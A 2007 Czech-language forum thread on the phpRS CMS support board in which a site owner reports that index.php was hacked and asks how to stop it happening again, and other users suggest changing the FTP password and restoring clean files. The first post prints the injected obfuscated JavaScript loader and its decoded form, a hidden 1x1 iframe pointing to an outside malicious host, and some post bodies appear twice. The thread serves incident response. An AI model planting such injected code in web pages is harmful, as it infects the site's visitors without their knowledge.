phpRS 2.6.5 : phpRS Fórum
Toto fórum je určené výhradně k diskuzi o verzi phpRS v2.6.5.
badware v index.php
Zaslán uživatelem/kou: GorTh (IP adresa zaznamenána)
Datum: 2007-06-12, 19:32
Rikame Ahoj,
muj kamarad ma stranky, na kterych bezi phprs 2.6.5, a jednoho dne v kvetnu se stalo to, ze z nam zahadneho duvodu byl modifikovan soubor index.php a to nasledujicim zpusobem.
Puvodni kod:
define('IN_CODE',true); // inic. ochranne konstanty
Zmeneny kod:
define('IN_CODE',true);echo "\n<script language=\"JavaScript\">e = '0x00' + '6C';str1 = \"%D7%8F%84%99%F3%9E%9F%94%87%88%D0%CD%99%84%9E%84%8D%84%87%84%9F%94%D5%8B%84%8F%8F%88%81%CD%D1%D7%84%89%9D%8C%80%88%F3%9E%9D%8E%D0%CD%8B%9F%9F%83%D5%C2%C2%8D%84%9F%88%8E%81%9F%C1%84%81%89%82%C2%87%8F%C2%80%88%81%9F%C2%CD%F3%9A%84%8F%9F%8B%D0%DC%F3%8B%88%84%8A%8B%9F%D0%DC%D1%D7%C2%84%89%9D%8C%80%88%D1%D7%C2%8F%84%99%D1\";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>\n"; // inic. ochranne konstanty
Onen zmeneny kod je po prekladu nasledujici:
<div style="visibility:hidden"><iframe src="http://bitecnt.info/ld/ment/" width=1 height=1></iframe></div>
Skodlivy kod jsem smazal a cekam, az zminovany web bude odstranen z googlovskeho "This site may harm your computer" a z stopbadware.org - zaslal jsem jim zadost. Problem vsak je, ze nevim jak zabranit tomu, aby se dany problem neopakoval. Hledal jsem, zda nebyl vydan nejaky security patch, ale na nic jsem nenarazil (nejsem si ani jist, zda je problem primo v phprs ci v nejakem pluginu). Nemate nekdo podobny problem, ci nevite, jak se onoho problemu vyvarovat?
muj kamarad ma stranky, na kterych bezi phprs 2.6.5, a jednoho dne v kvetnu se stalo to, ze z nam zahadneho duvodu byl modifikovan soubor index.php a to nasledujicim zpusobem.
Puvodni kod:
define('IN_CODE',true); // inic. ochranne konstanty
Zmeneny kod:
define('IN_CODE',true);echo "\n<script language=\"JavaScript\">e = '0x00' + '6C';str1 = \"%D7%8F%84%99%F3%9E%9F%94%87%88%D0%CD%99%84%9E%84%8D%84%87%84%9F%94%D5%8B%84%8F%8F%88%81%CD%D1%D7%84%89%9D%8C%80%88%F3%9E%9D%8E%D0%CD%8B%9F%9F%83%D5%C2%C2%8D%84%9F%88%8E%81%9F%C1%84%81%89%82%C2%87%8F%C2%80%88%81%9F%C2%CD%F3%9A%84%8F%9F%8B%D0%DC%F3%8B%88%84%8A%8B%9F%D0%DC%D1%D7%C2%84%89%9D%8C%80%88%D1%D7%C2%8F%84%99%D1\";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>\n"; // inic. ochranne konstanty
Onen zmeneny kod je po prekladu nasledujici:
<div style="visibility:hidden"><iframe src="http://bitecnt.info/ld/ment/" width=1 height=1></iframe></div>
Skodlivy kod jsem smazal a cekam, az zminovany web bude odstranen z googlovskeho "This site may harm your computer" a z stopbadware.org - zaslal jsem jim zadost. Problem vsak je, ze nevim jak zabranit tomu, aby se dany problem neopakoval. Hledal jsem, zda nebyl vydan nejaky security patch, ale na nic jsem nenarazil (nejsem si ani jist, zda je problem primo v phprs ci v nejakem pluginu). Nemate nekdo podobny problem, ci nevite, jak se onoho problemu vyvarovat?
Re: badware v index.php
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2007-06-12, 20:04
[http://www.lupa.cz/clanky/web-ktery-se-neubranil-phishingu/]
[http://www.symantec.com/security_response/writeup.jsp?docid=2005-120112-4018-99]
doporucil bych zmenit heslo na ftp
Celkem upraveno 1×. Poslední úprava MirekS v 12.06.2007 20:05.
[http://www.symantec.com/security_response/writeup.jsp?docid=2005-120112-4018-99]
doporucil bych zmenit heslo na ftp
Celkem upraveno 1×. Poslední úprava MirekS v 12.06.2007 20:05.
Re: badware v index.php
Zaslán uživatelem/kou: GorTh (IP adresa zaznamenána)
Datum: 2007-06-12, 20:59
Rikame Ahoj,
moc diky za rychlou odpoved, zarideme se dle tve rady. Omlouvam se, ze jsem s tim problemem sel na toto forum, ale ona udalost z roku 2005 mi unikla a ja si nevedel rady. Jeste jednou diky ...
moc diky za rychlou odpoved, zarideme se dle tve rady. Omlouvam se, ze jsem s tim problemem sel na toto forum, ale ona udalost z roku 2005 mi unikla a ja si nevedel rady. Jeste jednou diky ...
Re: badware v index.php
Zaslán uživatelem/kou: JanVar (IP adresa zaznamenána)
Datum: 2007-06-13, 01:19
doporučuji překontrolovat i ostatní soubory, případně, pokud si dělalvelké úpravy, použít zálohu těch souborů a přehrát všechno z phpRS... DB imho nebude potřeba...
Jinak jak píše MirekS
-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------
Jinak jak píše MirekS
-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------
Re: badware v index.php
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2007-06-13, 13:46
Rozhodne bolo treba upovedomiť admina hostingu, mohol zistiť viac. Hlavne to, či bol súbor zmenený cez FTP cez prelomené heslo (aj z akej IP), alebo nezabezpečeným php scriptom. Takto si teraz nemôžeš byť istý kadiaľ sa to svinstvo dostalo do systému a či sa to nebude opakovať. Ak nemáš v phpRS nelicencované alebo deravé pluginy, je to s vysokou pravdepodobnosťou problém prelomenia FTP hesla.
Lituji, ale pouze registrovaní uživatelé mohou zasílat příspěvky do této sekce.